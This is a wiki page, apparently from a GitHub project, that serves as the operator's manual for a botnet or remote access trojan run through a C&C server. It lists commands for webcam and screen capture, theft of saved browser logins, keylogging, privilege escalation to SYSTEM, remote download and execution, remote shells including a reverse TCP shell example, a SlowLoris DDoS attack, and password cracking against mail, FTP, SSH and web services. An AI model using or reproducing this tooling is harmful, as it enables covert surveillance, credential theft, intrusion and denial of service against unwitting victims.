Skip to content

Server Commands

Jump to bottom
AlMA PRO LEADER edited this page Jul 25, 2017 · 4 revisions

It's not that much of a different between those commands and the APSSH and IRC ones.
Even though the CPanel has buttons on it for those (plus we've explained most of them :|), we're going to list them:

  1. DSS: Desktop Screen-Shot: This one needs no explanation.
  2. goodbye: Obviously tells the bot to breakup with you :')
  3. wcs: Web-Cam Snap.
  4. logins: Sends all logins found in all four browsers (Chrome, Firefox, Safari and Opera).
  5. idle: How long has the user been idle?
  6. enlogger: Enable KeyLogger.
  7. dislogger: Disable KeyLogger.
  8. logs: Send both logs (KeyLogs (in case of default keylogger) and error logs).
  9. gh: Get Higher: Get higher than this level of privileges. Goes up to SYSTEM.
  10. cwt: Change Wait Time: Change the time bots wait before connecting again to the C&C server.
  11. df: Download file: Takes a URL as a parameter and downloads it in the current working directory.
  12. x: Executes a file. It takes (-cmd) as the first parameter if you want to run it in CMD, otherwise, the first parameter is the file.
  13. rcmd: Remote CMD. We recommend Be Shell over TCP.
  14. update: Takes the new file URL as a parameter.
  15. btcp: Bind TCP: A command to try and bind a port on the victim's device. Takes only port as parameter to try it publicaly or (-l) as the first parameter and the port as the second to try it locally. [Ex: btcp 55]/[Ex: btcp -l 55]
  16. rtcp: Reverse TCP: Takes one parameter HOST|PORT. Notice we use (|) mark not (:). [Ex: rtcp somehost|55]
  17. sl: SlowLoris: This is a DDoS attack for Hyper Text Transfer Protocol (HTTP(S)) services. Takes (-b) as the first parameter to work in the background, otherwise the bot will never connect back to use unless if you tell it over IRC.
  18. co: CrackOff: A cracking function that cracks Online services. It works on SMTP(S), IMAP(S), FTP, SSH (Currently down Check this), HTTP(S)[GET|POST]. Takes varies parameters count. Some services take host, port,username and password list, Others take more, hence, HTTP(S)[GET|POST]. It takes URL path and the request form if using POST method.
  19. fman: File Manager: This one has alot of sub ones! There they are:
  • ref: Refresh: Sends a fresh list of files and folders that are in the current working directory.
  • cd: We all know what that is.
  • df: Download a file.
  • uf: Upload a file.
  • x: As above so below.
  • del: Delete a file.
  • mkdir: Make a directory.
  • ren: Rename a file.
  • touch: Make a file.

The above sub commands and the fman command are used as follows:
fman ref
fman cd DESTINATION
fman df URL
fman uf LOCAL_FILE|LOCAL_DIRECTORY. In case of directory, upload all files.
fman x [-cmd] FILE
fman del FILE
fman mkdir DIRECTORY_NAME
fman ren FILE|NEW_NAME. Make sure you use (|) to separate them.
fman touch FILE. If file already exists, skip the command.

Clone this wiki locally